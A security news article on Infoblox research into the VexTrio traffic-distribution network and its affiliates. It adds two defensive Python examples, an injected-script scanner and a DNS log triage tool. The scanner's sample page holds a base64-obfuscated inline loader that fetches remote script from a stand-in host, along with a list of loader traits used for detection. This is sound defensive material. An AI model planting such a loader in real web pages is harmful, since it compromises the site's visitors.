
Cybercrime Central: VexTrio Operates Massive Criminal Affiliate Program

GUEST RESEARCH: Infoblox has released new research unveiling a set of large-scale cybercriminal partnerships led by the threat actor VexTrio. The partnerships involve an underground affiliate network of more than 60 members and are delivering high volumes of malware and other malicious content to networks in Australia, New Zealand and across the globe.

Formed more than six years ago, VexTrio is now one of the world’s largest malicious networks targeting internet users. It acts as a cybercriminal broker and operates traffic distribution systems (TDS) that route users to malicious websites based on their device, operating system, location, and other characteristics.

VexTrio has largely evaded detection and strengthened its resilience against internet service providers’ efforts to suspend its assets, all while building up a unique ‘partner program’.

“While cybercriminals are often portrayed as gangs of hackers or lone brilliant coders, more often they buy and sell goods and services as part of a larger criminal economy,” said Renée Burton, Head of Threat Intelligence at Infoblox and a former Senior Executive (DISL) with the U.S. National Security Agency (NSA).

“For example, some actors sell malware services, and malware-as-a-service (MaaS) allows buyers easy access to the infrastructure necessary to commit crimes. These service providers also form strategic partnerships, similar to the way legitimate companies do, in order to extend the limits of their current operations. Such relationships are forged in secret and may include a number of partners, making them difficult to untangle and understand from an outside perspective.”

Key findings from the report include:

  • VexTrio is the single most pervasive threat in Infoblox customers’ networks, active in more than 50 per cent of networks in just the last two years.
  • The threat actor acts as a broker of malicious traffic for more than 60 cybercriminal affiliates.
  • Partnerships tend to be longstanding and operate in a unique way, with VexTrio providing a number of dedicated servers to each affiliate.
  • Despite connecting millions of web users to malicious content for more than six years, VexTrio has largely evaded detection: its business model feeds on web traffic supplied by its affiliates, and its infrastructure is built on compromised websites.
  • Two of its largest affiliates are ClearFake and SocGholish, malicious JavaScript frameworks that present website visitors with harmful content and inject malicious JavaScript into vulnerable websites, respectively. SocGholish is widely considered to be one of the top three global threats today.
  • VexTrio is a prolific domain name system (DNS) attacker and has more than 70,000 known malicious domains.

The most common attack method deployed by VexTrio and its affiliates is the ‘drive-by compromise’, where actors compromise vulnerable WordPress websites and inject malicious JavaScript into their HTML pages. This script typically hands visitors to a TDS that redirects them to malicious infrastructure and gathers information such as their IP address. VexTrio also operates SMS scams and sells victims’ phone numbers to other cybercriminals.
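For a site owner, the practical check that follows from this is to look at the page as the browser receives it and ask which script tags the site did not put there. The following is an added example, not code from Infoblox or from the report: it parses a constructed WordPress-style page, flags external script hosts outside a constructed allowlist, and flags inline scripts carrying generic loader traits (decoding with atob, eval, dynamic script insertion). The allowlist, sample HTML and token list are assumptions for illustration, not indicators for any specific campaign.

```python
"""Scan a WordPress-style HTML page for script tags that look injected.

Added example; not Infoblox's or the report's code. The page HTML, the
allowlist and the token list below are constructed for illustration and
are generic heuristics, not signatures for VexTrio or its affiliates.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the site owner expects to serve scripts from (constructed allowlist).
ALLOWED_SCRIPT_HOSTS = {"example-blog.test", "cdn.example-blog.test"}

# Generic traits of obfuscated loader/redirector code in inline scripts (assumption).
SUSPICIOUS_TOKENS = (
    "eval(", "atob(", "fromCharCode", "document.write(",
    "location.replace(", "location.href", 'createElement("script")',
)


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []      # values of <script src="...">
        self.inline = []        # bodies of <script>...</script>
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script = True
                self._buf = []

    def handle_data(self, data):
        # HTMLParser treats <script> content as CDATA and delivers it here.
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def scan_page(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return (kind, detail) findings for scripts that look injected."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.external:
        host = urlparse(src).hostname
        # A relative src has no host and is served by the site itself.
        if host and host.lower() not in allowed_hosts:
            findings.append(("external-script-unknown-host", host.lower()))
    for body in collector.inline:
        hits = [t for t in SUSPICIOUS_TOKENS if t in body]
        if hits:
            findings.append(("inline-script-suspicious", ",".join(hits)))
    return findings


# Constructed sample: one legitimate CDN script, one theme script, one
# injected inline loader that decodes its target, one unknown external host.
SAMPLE_PAGE = """<html><head>
<script src="https://cdn.example-blog.test/wp-includes/js/jquery.min.js"></script>
<script src="/wp-content/themes/site/theme.js"></script>
<script>
var _q = atob("aHR0cHM6Ly9sb2FkZXIuaG9zdC50ZXN0");
var s = document.createElement("script"); s.src = _q + "/l.js";
document.head.appendChild(s);
</script>
</head><body><p>Welcome</p>
<script src="https://static.unknown-host.test/stats.js"></script>
</body></html>"""


if __name__ == "__main__":
    for kind, detail in scan_page(SAMPLE_PAGE):
        print(kind, detail)
```

Run it against a saved copy of a page fetched as an anonymous visitor, not the WordPress editor view: injected loaders often serve only to visitors that match a TDS profile, so the administrator's own browser may never see them.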


“Although difficult to identify and track, blocking VexTrio at the DNS level can disrupt and protect against a large spectrum of cybercriminal activity,” added Burton.

“This can be achieved through using tailored DNS signatures and statistical-based algorithms to identify VexTrio’s intermediary TDS servers and domains shortly after they’re registered. As Australian organisations look to raise their security posture in the wake of the new Cyber Security Strategy, it’s important to understand how DNS threat actors like VexTrio operate, particularly as more than 90 per cent of malware depends on DNS at some stage of its execution.”
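The two inputs named above, signatures for known TDS domains and statistical features of recently registered domains, can be combined into a block decision at the resolver. The following is an added example of that triage over DNS query logs, not Infoblox's detection logic and not the algorithms described in the report. The log lines, the "known TDS" blocklist, the registration-date table (standing in for a WHOIS/RDAP lookup), the 30-day age window and the entropy threshold are all constructed assumptions; none of the domains are real indicators.

```python
"""Triage DNS query logs for domains that warrant a DNS-level block.

Added example; not Infoblox's detection logic. Every domain, the blocklist,
the registration dates and the thresholds are constructed for illustration.
"""
import math
from datetime import date

# Constructed "known TDS" signatures; stands in for a vendor threat feed.
KNOWN_TDS = {"tds-redirector.test"}

# Constructed registration dates; stands in for a WHOIS/RDAP lookup.
REGISTERED_ON = {
    "example-blog.test": date(2015, 3, 2),
    "fresh-traffic-hop.test": date(2024, 1, 20),
    "x7kq2pz9vm41hj.test": date(2024, 1, 24),
}

MAX_AGE_DAYS = 30        # "shortly after registration" window (assumption)
ENTROPY_THRESHOLD = 3.5  # bits/char; natural-language labels sit lower (assumption)
TODAY = date(2024, 1, 26)  # fixed so the sample is reproducible offline


def registrable_domain(qname):
    """Last two labels of the query name (ignores multi-label public suffixes)."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def shannon_entropy(s):
    """Shannon entropy in bits per character of the string s."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(s.count(c) / n * math.log2(s.count(c) / n) for c in set(s))


def domain_age_days(domain, today):
    """Days since registration, or None when the registrar data is unknown."""
    reg = REGISTERED_ON.get(domain)
    return None if reg is None else (today - reg).days


def classify(qname, today):
    """Return (verdict, reasons) for one query name."""
    domain = registrable_domain(qname)
    reasons = []
    if domain in KNOWN_TDS:
        reasons.append("known-tds")
    age = domain_age_days(domain, today)
    if age is not None and age < MAX_AGE_DAYS:
        reasons.append(f"newly-registered:{age}d")
    label = domain.split(".")[0]
    ent = shannon_entropy(label)
    if len(label) >= 10 and ent > ENTROPY_THRESHOLD:
        reasons.append(f"high-entropy:{ent:.2f}")
    # Block on a signature hit, or when two independent statistical
    # indicators agree; a young domain alone is not enough to block.
    verdict = "block" if "known-tds" in reasons or len(reasons) >= 2 else "allow"
    return verdict, reasons


def triage_log(lines, today):
    """Parse 'timestamp client qname qtype' lines into {qname: (verdict, reasons)}."""
    results = {}
    for line in lines:
        parts = line.split()
        if len(parts) < 4:
            continue  # skip malformed lines rather than crash the pass
        results[parts[2]] = classify(parts[2], today)
    return results


SAMPLE_LOG = [  # constructed query log
    "2024-01-25T10:00:01Z 10.0.0.12 www.example-blog.test A",
    "2024-01-25T10:00:02Z 10.0.0.12 cdn.tds-redirector.test A",
    "2024-01-25T10:00:03Z 10.0.0.12 fresh-traffic-hop.test A",
    "2024-01-25T10:00:04Z 10.0.0.12 a.x7kq2pz9vm41hj.test A",
    "garbled line",
]


def run_sample():
    return triage_log(SAMPLE_LOG, TODAY)


if __name__ == "__main__":
    for qname, (verdict, reasons) in run_sample().items():
        print(f"{verdict:5} {qname} {reasons}")
```

In production the blocklist and age lookups come from a threat feed and a registrar API rather than dictionaries, and the verdicts feed a response policy zone on the resolver. The entropy rule is deliberately weak on its own: dictionary-word labels score close to the threshold, which is why the decision requires a second indicator.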

The full report on VexTrio and its affiliate network can be found here.
